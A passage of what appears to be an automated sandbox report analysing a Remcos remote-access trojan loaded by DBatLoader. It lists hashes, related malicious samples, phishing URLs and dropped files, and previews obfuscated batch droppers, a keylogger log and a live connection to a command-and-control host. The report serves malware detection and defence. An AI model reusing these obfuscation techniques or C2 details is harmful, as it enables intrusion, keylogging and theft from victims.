                                                                                    RFQ.NO. S70-23Q-1474-CS-P.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                    • 178.237.33.50
                                                                                    F873635427.vbsGet hashmaliciousRemcos, XWormBrowse
                                                                                    • 178.237.33.50
                                                                                    F873635427.vbsGet hashmaliciousRemcos, XWormBrowse
                                                                                    • 178.237.33.50
                                                                                    5FU4LRpQdy.rtfGet hashmaliciousRemcosBrowse
                                                                                    • 178.237.33.50
                                                                                    awb_shipping_documents_17_04_2024_00000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                    • 178.237.33.50
                                                                                    EFEMACPedido0180040240418.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                    • 178.237.33.50
                                                                                    Quotation 20241804.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                    • 178.237.33.50
                                                                                    MICROSOFT-CORP-MSN-AS-BLOCKUShttps://dinamicconsultores.app.questorpublico.com.br/Get hashmaliciousHTMLPhisherBrowse
                                                                                    • 13.107.246.41
                                                                                    PO_983888123.xlsGet hashmaliciousUnknownBrowse
                                                                                    • 13.107.213.41
                                                                                    2020.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                    • 13.107.137.11
                                                                                    Signed Proforma Invoice 3645479_pdf.vbsGet hashmaliciousFormBookBrowse
                                                                                    • 13.107.139.11
                                                                                    https://www.canva.com/design/DAGCxF7mFTo/x_4mk65cpl5G5aJF2UYVbw/view?utm_content=DAGCxF7mFTo&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 52.96.165.34
                                                                                    https://watsonpropertyllc.formstack.com/forms/staffGet hashmaliciousUnknownBrowse
                                                                                    • 13.107.246.40
                                                                                    https://znixulyp.com/vGgw6oGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 13.107.213.40
                                                                                    https://huntingtonoakmont-my.sharepoint.com/:b:/g/personal/cmariotti_oakmontcommunities_com/EeUv57weU1BKhs36H3rF_G0BHM4kTzJShI_ZPwFvp1P7-g?e=4UASJ5Get hashmaliciousHTMLPhisherBrowse
                                                                                    • 52.107.247.70
                                                                                    http://t.cm.morganstanley.com/r/?id=h1b92d14,134cc33c,1356be32&p1=esi-doc.one/YWGTytNgAkCXj6A/c451eb59da652ea3e0bb7f8bf62dc775/c451eb59da652ea3e0bb7f8bf62dc775/c451eb59da652ea3e0bb7f8bf62dc775/bXNvbG9yemFub0Bsc2ZjdS5vcmc=&d=DwMGaQGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 52.96.173.162
                                                                                    https://t.airgears.org/r/?resource=120958450/4d9ac80/2a1170&e=dYRtX3NhcXBhbXduQUFjYW4kb26DYXK0LWQzJnV0bW9zb3WyY3V9YWNkJnV1bV9uAWRpdZ09ZW1ibWwmd39udW09OUT3MTNwMzQzMUYmd391cj0zJm1pX4U9eW5kZWApbmVlJmNpZD2yYURNNzV0NDgmYnlkPUE2MjBzN&ref_=1wy&ref=98k/&u=4jj4/&eid=xekc6v/DU5MjEnc2VoY29lZT11cmRlZnluZWQ&s=obI3r-q7de3Me3nnN3cpKfiix7CULJmXF7FuunFtjSxGet hashmaliciousUnknownBrowse
                                                                                    • 13.107.246.41

                                                                                    JA3 Fingerprints

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    a0e9f5d64349fb13191bc781f81f42e1PO_983888123.xlsGet hashmaliciousUnknownBrowse
                                                                                    • 13.107.139.11
                                                                                    8Sb3Ng0nF3.exeGet hashmaliciousLummaCBrowse
                                                                                    • 13.107.139.11
                                                                                    SecuriteInfo.com.Riskware.2144FlashPlayer.20362.15838.exeGet hashmaliciousUnknownBrowse
                                                                                    • 13.107.139.11
                                                                                    Gantt_Excel_Pro_Daily_Free1.xlsmGet hashmaliciousUnknownBrowse
                                                                                    • 13.107.139.11
                                                                                    SecuriteInfo.com.Riskware.2144FlashPlayer.20362.15838.exeGet hashmaliciousUnknownBrowse
                                                                                    • 13.107.139.11
                                                                                    5B8DEyPZmK.exeGet hashmaliciousLummaCBrowse
                                                                                    • 13.107.139.11
                                                                                    file.exeGet hashmaliciousRisePro StealerBrowse
                                                                                    • 13.107.139.11
                                                                                    dendy.exeGet hashmaliciousRisePro StealerBrowse
                                                                                    • 13.107.139.11
                                                                                    5Dw2hTQmiB.exeGet hashmaliciousLummaCBrowse
                                                                                    • 13.107.139.11
                                                                                    Quotation 20241804.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                    • 13.107.139.11

                                                                                    Dropped Files

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    C:\Users\Public\Libraries\Ocihlomc.PIF2020.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                      C:\Users\Public\Libraries\easinvoker.exe2020.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                        Quotation 20241804.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                          ORDER-CONFIRMATION-DETAILS-000235374564.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                            SecuriteInfo.com.Win32.RATX-gen.12024.12837.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                              RFQ-DOC#GMG7278726655738_PM62753_Y82629_xcod.0.GZGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                20240416-703661.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                  SecuriteInfo.com.FileRepMalware.21353.16266.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                    disktop.pif.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                      NEW ORDER 04154SHOP N0AWE12893.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                        ONISZCZUK ASSOCIATES Purchase Order.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                          C:\Users\Public\Libraries\netutils.dll2020.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                            Quotation 20241804.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                              ORDER-CONFIRMATION-DETAILS-000235374564.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                SecuriteInfo.com.Win32.RATX-gen.12024.12837.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                  RFQ-DOC#GMG7278726655738_PM62753_Y82629_xcod.0.GZGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                    20240416-703661.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                      SecuriteInfo.com.FileRepMalware.21353.16266.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                        disktop.pif.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                          NEW ORDER 04154SHOP N0AWE12893.batGet hashmaliciousRemcos, DBatLoaderBrowse

                                                                                                                            Created / dropped Files

                                                                                                                            C:\ProgramData\ffrrdds\logs.dat

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\colorcpl.exe
                                                                                                                            File Type:data
                                                                                                                            Category:modified
                                                                                                                            Size (bytes):376
                                                                                                                            Entropy (8bit):3.3887556315284373
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:6l+12U5YcIeeDAlIfE/OS/1gWAGfE/OSFWA7DxbN2fBMMm0v:6lDUecB/OSqWa/OSFWItN25MMl
                                                                                                                            MD5:337644C91CCEBEB2BCE05418EF557FDF
                                                                                                                            SHA1:02D0C7A54629455A672BD6A7786DD291625D5C09
                                                                                                                            SHA-256:FB837642524D383EEEFF71363009A1EE69A45C59C913DB4D80AC526E6F1A051C
                                                                                                                            SHA-512:9878F78F2F9D4471DEC4352A64688F99E44A5CBE6C35C26783CF8218EB5FDDD21E2DDDA67CD4154315B93A5450170F2FD52D2D7BAC015B8EA22401EDAB670C7E
                                                                                                                            Malicious:true
                                                                                                                            Yara Hits:
                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\ffrrdds\logs.dat, Author: Joe Security
                                                                                                                            Reputation:low
                                                                                                                            Preview:....[.2.0.2.4./.0.4./.1.8. .2.1.:.2.6.:.5.4. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.C.o.l.o.u.r. .M.a.n.a.g.e.m.e.n.t.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.C.o.l.o.u.r. .M.a.n.a.g.e.m.e.n.t.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .0. .m.i.n.u.t.e.s. .}.....

                                                                                                                            C:\Users\Public\Libraries\Null

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\Desktop\XY2I8rWLkM.exe
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):3
                                                                                                                            Entropy (8bit):1.584962500721156
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:m:m
                                                                                                                            MD5:66B86AB0232F8377C518F27EF9AE4BE8
                                                                                                                            SHA1:08E5BA8AB2C17ED0EB5CDD45C51F7391EA6190FF
                                                                                                                            SHA-256:92961E9752250EFA971147344B22295DB32D7B75E940E0971E5FB34F21D0BC67
                                                                                                                            SHA-512:F470202BB57BFB03C37AC0A8EE67F8094AF85DF9BF10C1BF5706A035262050AF7418D8F68EED7EE00C249A3C49B4DD247EDED5B49A7CEBEAB756697FC8CE0545
                                                                                                                            Malicious:false
                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                            Preview:6..

                                                                                                                            C:\Users\Public\Libraries\Ocihlomc

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\Desktop\XY2I8rWLkM.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):803972
                                                                                                                            Entropy (8bit):7.399378314009563
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12288:SWIv08K3Mbq4LpF6Ow5qWE7KrGe9oJXdhTIIvZAAc1LaEhMfHU0MlXk5:SP/K3j4LndAqWE7WNqRkYAdWEIHxMlXS
                                                                                                                            MD5:E8830F86B5FE9223E52332D463FB5492
                                                                                                                            SHA1:669BFD99B16FE93E9B4D73BDD332FB75074561DE
                                                                                                                            SHA-256:6669FC91687DEBFEBC0887CA97257722412C715366DA56CB78A80D67901BA4D2
                                                                                                                            SHA-512:2657886F87D34339D8188ED80C212A7E79AE7A70310F8511C6C6B143C7F695E9F4FBCF34632E43AC332B51CF096035E3D09342F8BBE491FEA1F3A2A29BE7831D
                                                                                                                            Malicious:true
                                                                                                                            Preview:KIJFaV..BaDh"".aDEF!GKIJ""DaEDVXEDBa+,20(%/;)6(7/3(1:2)-%26&6*:0*24-5=&$(5(069.71(;3-4;3039&(;+31%-62=%3KIJFaV..BaDh"".aDEF!GKIJ""DaEDVXEDBap&,+/20&:,;KIJFaV..BaDh"".aDEF!GKIJ""DaEDVXEDBa..................................................................................................................................................................................................................................................................................................................................................................................9...3...*..gX..............................................................................................................................................................................................................................

                                                                                                                            C:\Users\Public\Libraries\Ocihlomc.PIF

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):2200064
                                                                                                                            Entropy (8bit):7.353300273739676
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:49152:3ARQYxxZrm0UZu0LCi2wcc/Z9L7KtQDSxxZrmh7:3Uxu0UQ0LCccaZ9LU7xuh
                                                                                                                            MD5:29AF19382BDEADEE6D93B98F354E703D
                                                                                                                            SHA1:3D38885812AA0C910025D86E05287600C745F5C8
                                                                                                                            SHA-256:8A005601E52341E8AFF3C95CF30F4EDE6B874D2B7E6FFDB9AFDA9425733FC5D7
                                                                                                                            SHA-512:AC5DF65ACDB4B3FBE288983EB7498761C64E7E3DD4161D1F74A6B749468C7B5B5209474E91E199625933F439785A730D181C30D2379F791EA5F424FC407649EF
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 53%
                                                                                                                            Joe Sandbox View:
                                                                                                                            • Filename: 2020.xls, Detection: malicious, Browse
                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................ .............@..........................0"..................@...............................%........................... ..He...................................................................................text...t........................... ..`.itext..h........................... ..`.data...............................@....bss....T6...........j...................idata...%.......&...j..............@....tls....4................................rdata..............................@..@.reloc..He... ...f..................@..B.rsrc...............................@..@.............0".......!.............@..@................................................................................................

                                                                                                                            C:\Users\Public\Libraries\OcihlomcO.bat

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\Desktop\XY2I8rWLkM.exe
                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (15012), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):30026
                                                                                                                            Entropy (8bit):3.9380000056299878
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:IBOY7cKQ/CyntVZjpubO0bXWQtagxP2+3o5WIGbfJTAy:C
                                                                                                                            MD5:828FFBF60677999579DAFE4BF3919C63
                                                                                                                            SHA1:A0D159A1B9A49E9EACCC53FE0C3266C0526A1BDC
                                                                                                                            SHA-256:ABAC4A967800F5DA708572EC42441EC373CD52459A83A8A382D6B8579482789D
                                                                                                                            SHA-512:BF00909E24C5A6FB2346E8457A9ADACD5F1B35988D90ABBDE9FF26896BBB59EDAFEA60D9DB4D10182A7B5E129BB69585D3E20BC5C63AF3517B3A7EF1E45FFB7E
                                                                                                                            Malicious:false
                                                                                                                            Yara Hits:
                                                                                                                            • Rule: MALWARE_BAT_KoadicBAT, Description: Koadic post-exploitation framework BAT payload, Source: C:\Users\Public\Libraries\OcihlomcO.bat, Author: ditekSHen
                                                                                                                            Preview:..&@cls&@set "_...=H zAnOeUIivpoS3l71mXMxw8yaqYTEuKgFGPJZRfr@k6Wj9sbQB4VtLD2d0C5Nch"..%_...:~41,1%%_...:~47,1%%_...:~6,1%%_...:~53,1%%_...:~1,1%"_...=%_...:~10,1%%_...:~39,1%%_...:~16,1%%_...:~13,1%%_...:~25,1%%_...:~53,1%%_...:~42,1%%_...:~22,1%%_...:~18,1%%_...:~48,1%%_...:~51,1%%_...:~2,1%%_...:~61,1%%_...:~9,1%%_...:~19,1%%_...:~44,1%%_...:~50,1%%_...:~57,1%%_...:~26,1%%_...:~4,1%%_...:~62,1%%_...:~3,1%%_...:~33,1%%_...:~38,1%%_...:~40,1%%.......%%_...:~60,1%%_...:~0,1%%_...:~43,1%%_...:~34,1%%_...:~58,1%%_...:~15,1%%_...:~7,1%%_...:~20,1%%_...:~49,1%%_...:~35,1%%_...:~14,1%%_...:~30,1%%_...:~36,1%%_...:~41,1%%_...:~45,1%%_...:~11,1%%_...:~55,1%%_...:~32,1%%_...:~17,1%%_...:~63,1%%_...:~56,1%%_...:~21,1%%_...:~37,1%%_...:~8,1%%_...:~54,1%%_...:~28,1%%_...:~6,1%%.......%%_...:~5,1%%_...:~59,1%%_...:~52,1%%_...:~29,1%%_...:~24,1%%_...:~12,1%%_...:~46,1%%_...:~47,1%%_...:~1,1%%_...:~23,1%%_...:~27,1%%_...:~31,1%"..%_...:~38,1%%_...:~59,1%%_...:~51,1%%_...:~5,1%%_...:~60,1%"_....=%_...

                                                                                                                            C:\Users\Public\Libraries\aaa.bat

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\Desktop\XY2I8rWLkM.exe
                                                                                                                            File Type:DOS batch file, ASCII text, with very long lines (468), with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):3646
                                                                                                                            Entropy (8bit):5.383959173452972
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:Zx2A0d5a9zHPwo0uP6SXjr4XtgPmon38JV7ZVhvoXS966hYxcdF4AlM5NQYE2Pl+:3L6jThc/pkmZAXpA2
                                                                                                                            MD5:71E46EFE9932B83B397B44052513FB49
                                                                                                                            SHA1:741AF3B8C31095A0CC2C39C41E62279684913205
                                                                                                                            SHA-256:11C20FABF677CD77E8A354B520F6FFCA09CAC37CE15C9932550E749E49EFE08A
                                                                                                                            SHA-512:76DA3B441C0EAAAABDD4D21B0A3D4AA7FD49D73A5F0DAB2CFB39F2E114EFE4F4DABE2D46B01B66D810D6E0EFA97676599ECE5C213C1A69A5F2F4897A9B4AC8DA
                                                                                                                            Malicious:false
                                                                                                                            Preview:@echo off..set "Nnqr=set "..%Nnqr%"njyC=="..%Nnqr%"qkMvMLsfma%njyC%http"..%Nnqr%"dbvWEsxWns%njyC%rem "..%Nnqr%"NpzRZtRBVV%njyC%Cloa"..%Nnqr%"ftNVZzSZxa%njyC%/Bat"..%Nnqr%"TwupSEtIWD%njyC%gith"..%Nnqr%"yIGacXULig%njyC%k"..%Nnqr%"uGlGnqCSun%njyC%h2sh"..%Nnqr%"FUsYUbfxRq%njyC%s://"..%Nnqr%"ewghYLVJDJ%njyC%om/c"..%Nnqr%"ZxOeNaoDFO%njyC%ub.c"..%dbvWEsxWns%%qkMvMLsfma%%FUsYUbfxRq%%TwupSEtIWD%%ZxOeNaoDFO%%ewghYLVJDJ%%uGlGnqCSun%%ftNVZzSZxa%%NpzRZtRBVV%%yIGacXULig%..%Nnqr%"dbvWEsxWns%njyC%@ech"..%Nnqr%"qkMvMLsfma%njyC%o of"..%Nnqr%"FUsYUbfxRq%njyC%f"..%dbvWEsxWns%%qkMvMLsfma%%FUsYUbfxRq%..%Nnqr%"NOtbuvMLuE%njyC%alph"..%Nnqr%"jSzGRzcKvC%njyC%ul 2"..%Nnqr%"KhBjpctAkV%njyC%.exe"..%Nnqr%"ftNVZzSZxa%njyC%c32."..%Nnqr%"czhHhGJsdj%njyC%m32\"..%Nnqr%"TOzhrohQZT%njyC% C:\"..%Nnqr%"NpzRZtRBVV%njyC%exe "..%Nnqr%"ppIMorhdlj%njyC% &"..%Nnqr%"SXdBSshqoL%njyC%Publ"..%Nnqr%"apGEijJnKT%njyC%\cmd"..%Nnqr%"qkMvMLsfma%njyC%Wind"..%Nnqr%"QxcSEoHMVZ%njyC%s\\S"..%Nnqr%"AvhQIkjRki%njyC%a.ex"..%Nnqr%"yIGacXULig%njyC%/

                                                                                                                            C:\Users\Public\Libraries\easinvoker.exe

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\Desktop\XY2I8rWLkM.exe
                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):131648
                                                                                                                            Entropy (8bit):5.225468064273746
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3072:zar2xXibKcf5K67+k02XbFbosspwUUgcR:Nibl7+k02XZb9UA
                                                                                                                            MD5:231CE1E1D7D98B44371FFFF407D68B59
                                                                                                                            SHA1:25510D0F6353DBF0C9F72FC880DE7585E34B28FF
                                                                                                                            SHA-256:30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
                                                                                                                            SHA-512:520887B01BDA96B7C4F91B9330A5C03A12F7C7F266D4359432E7BACC76B0EEF377C05A4361F8FA80AD0B94B5865699D747A5D94A2D3DCDB85DABF5887BB6C612
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Joe Sandbox View:
                                                                                                                            • Filename: 2020.xls, Detection: malicious, Browse
                                                                                                                            • Filename: Quotation 20241804.exe, Detection: malicious, Browse
                                                                                                                            • Filename: ORDER-CONFIRMATION-DETAILS-000235374564.cmd, Detection: malicious, Browse
                                                                                                                            • Filename: SecuriteInfo.com.Win32.RATX-gen.12024.12837.exe, Detection: malicious, Browse
                                                                                                                            • Filename: RFQ-DOC#GMG7278726655738_PM62753_Y82629_xcod.0.GZ, Detection: malicious, Browse
                                                                                                                            • Filename: 20240416-703661.cmd, Detection: malicious, Browse
                                                                                                                            • Filename: SecuriteInfo.com.FileRepMalware.21353.16266.exe, Detection: malicious, Browse
                                                                                                                            • Filename: disktop.pif.exe, Detection: malicious, Browse
                                                                                                                            • Filename: NEW ORDER 04154SHOP N0AWE12893.bat, Detection: malicious, Browse
                                                                                                                            • Filename: ONISZCZUK ASSOCIATES Purchase Order.bat, Detection: malicious, Browse
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........GF..)...)...).,.....).,.....).,.....)...(.V.).,.....).,.....).,.....).,.....).Rich..).........................PE..d...^PPT.........."..........D...... ..........@............................. ......z................ ..................................................................@&......4....................................................................................text............................... ..`.imrsiv..................................data...............................@....pdata..............................@..@.idata..............................@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................

                                                                                                                            C:\Users\Public\Libraries\netutils.dll

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\Desktop\XY2I8rWLkM.exe
                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):116908
                                                                                                                            Entropy (8bit):5.087211878722834
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:1536:AxdWID3z1y5XtsBms9bOPu5jDqWte6VNCl7MbiRvRRJHu:AxdB/usBLOP8qWte6VQRRJHu
                                                                                                                            MD5:566B326055C3ED8E2028AA1E2C1054D0
                                                                                                                            SHA1:C25FA6D6369C083526CAFCF45B5F554635AFE218
                                                                                                                            SHA-256:A692D4305B95E57E2CFC871D53A41A5BFC9E306CB1A86CA1159DB4F469598714
                                                                                                                            SHA-512:DA4B0B45D47757B69F9ABC1817D3CB3C85DEB08658E55F07B016FBA053EFE541A5791B9B2B380C25B440BBAE6916C5A2245261553CA3C5025D9D55C943F9823C
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 45%
                                                                                                                            Joe Sandbox View:
                                                                                                                            • Filename: 2020.xls, Detection: malicious, Browse
                                                                                                                            • Filename: Quotation 20241804.exe, Detection: malicious, Browse
                                                                                                                            • Filename: ORDER-CONFIRMATION-DETAILS-000235374564.cmd, Detection: malicious, Browse
                                                                                                                            • Filename: SecuriteInfo.com.Win32.RATX-gen.12024.12837.exe, Detection: malicious, Browse
                                                                                                                            • Filename: RFQ-DOC#GMG7278726655738_PM62753_Y82629_xcod.0.GZ, Detection: malicious, Browse
                                                                                                                            • Filename: 20240416-703661.cmd, Detection: malicious, Browse
                                                                                                                            • Filename: SecuriteInfo.com.FileRepMalware.21353.16266.exe, Detection: malicious, Browse
                                                                                                                            • Filename: disktop.pif.exe, Detection: malicious, Browse
                                                                                                                            • Filename: NEW ORDER 04154SHOP N0AWE12893.bat, Detection: malicious, Browse
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f.^........& ....."...$................<a.............................0................ ..............................................................`..(...............\........................... ...(................................................... ...0!.......".................. .P`. ........@.......(..............@.p.. .......P.......0..............@.P@. ..(....`.......6..............@.0@. .......p.......:..............@.0@. ..................................p.. ...............<..............@.0@. ...............>..............@.0.. ....X............F..............@.@.. ....h............H..............@.`.. ..\............J..............@.0B/4...................L..............@.PB/19..................P..............@..B/31.....%...........................@..B/45.....q...........................@..B/57.....

                                                                                                                            C:\Users\Public\Ocihlomc.url

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\Desktop\XY2I8rWLkM.exe
                                                                                                                            File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Ocihlomc.PIF">), ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):100
                                                                                                                            Entropy (8bit):5.0203091011883165
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMOTGaOsb8V+Kxy:HRYFVmTWDyz3TGaOETKg
                                                                                                                            MD5:C071CAC205ED06395BF23543B4BEFF28
                                                                                                                            SHA1:3574C8837E5D484F4E1D46E4285AF9D71AC67DFA
                                                                                                                            SHA-256:C47EF6BE72FE3FC27BA2F64DBDB7606654D6F822CB797D5CC10959E3AD7A2B65
                                                                                                                            SHA-512:383C0C063F1CDC29A5A82672883A99EEA4A85D6C5EC0EA157D2A044BBEE39EDBEBB7987EC0378CBF31C107F4D9D233782939652BAAF00A4E6E6604474B1DAA75
                                                                                                                            Malicious:true
                                                                                                                            Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Ocihlomc.PIF"..IconIndex=40..HotKey=66..

                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\json[1].json

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\colorcpl.exe
                                                                                                                            File Type:JSON data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):963
                                                                                                                            Entropy (8bit):4.995620093649274
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12:tklzTknd6CsGkMyGWKyGXPVGArwY3+8aIHrGIArpv/mOAaNO+ao9W7iN5zzkw7Rr:qlkdRNuKyGX855vXhNlT3/77Kdxtro
                                                                                                                            MD5:334018F02CE31BCBB4864D602B557FE5
                                                                                                                            SHA1:C6DE43E8D6B5C026C0B0A56A898A3F00B282B881
                                                                                                                            SHA-256:F70CE925C3923E25A5ADB7089E7EE752E771FBD073888ABFC426138C9094F1B3
                                                                                                                            SHA-512:31EF486A2F75226594BC553CBAFA84B645B6ED456F35F363C8EFD6229F4A731981CA1B7736CD4BD739DDCA885F068E96692BB16C7A906314B52220DC63E318BB
                                                                                                                            Malicious:false
                                                                                                                            Preview:{. "geoplugin_request":"81.181.57.52",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Marietta",. "geoplugin_region":"Georgia",. "geoplugin_regionCode":"GA",. "geoplugin_regionName":"Georgia",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"524",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"34.0414",. "geoplugin_longitude":"-84.5053",. "geoplugin_locationAccuracyRadius":"1000",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                                                                            \Device\ConDrv

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\colorcpl.exe
                                                                                                                            File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):682
                                                                                                                            Entropy (8bit):4.620947518135425
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12:caFqFkLmxyRbmkclkL6hnRRJxINJ/Xqd3egsygDYEW3dtlEW3jgGn:7QFtUbmjlpRPOIwg+NW3doW3L
                                                                                                                            MD5:6CD6CDA7A98CEB3372296E5602058AE7
                                                                                                                            SHA1:8F5B7B31C909F66CB005C3DE2898F280930DE1E5
                                                                                                                            SHA-256:1931169ECD83DB9970D0A6CC3EB4A5638C82C27818AD7411FAD681024F9EBCE0
                                                                                                                            SHA-512:E01DBEBDC96FFBA902CC2AFC4297B7764CDEDA302F1EE23C06B6D831D069790B6DE1F92B074D99D953C2FF8EA5C9368D63A9412D5C967591D104240EA8921490
                                                                                                                            Malicious:true
                                                                                                                            Preview:... ______ ...(_____ \ ... _____) )_____ ____ ____ ___ ___ ...| __ /| ___ | \ / ___) _ \ /___)...| | \ \| ____| | | ( (__| |_| |___ |...|_| |_|_____)_|_|_|\____)___/(___/ .....Remcos v4.9.4 Pro.... BreakingSecurity.net....21:26:54:957 i | Remcos Agent initialized..21:26:54:957 i | Offline Keylogger Started..21:26:54:957 E | Keylogger initialization failure: error 126..21:26:54:973 i | Access Level: Administrator..21:26:55:021 i | Connecting | TLS Off | jantis.duckdns.org:1188..21:26:55:579 i | Connected | TLS Off | jantis.duckdns.org:1188..21:26:56:025 i | KeepAlive | Enabled | Timeout: 60..

                                                                                                                            Static File Info

                                                                                                                            General

                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Entropy (8bit):7.353300273739676
                                                                                                                            TrID:
                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.38%
                                                                                                                            • InstallShield setup (43055/19) 0.43%
                                                                                                                            • Windows Screen Saver (13104/52) 0.13%
                                                                                                                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                            File name:XY2I8rWLkM.exe
                                                                                                                            File size:2'200'064 bytes
                                                                                                                            MD5:29af19382bdeadee6d93b98f354e703d
                                                                                                                            SHA1:3d38885812aa0c910025d86e05287600c745f5c8
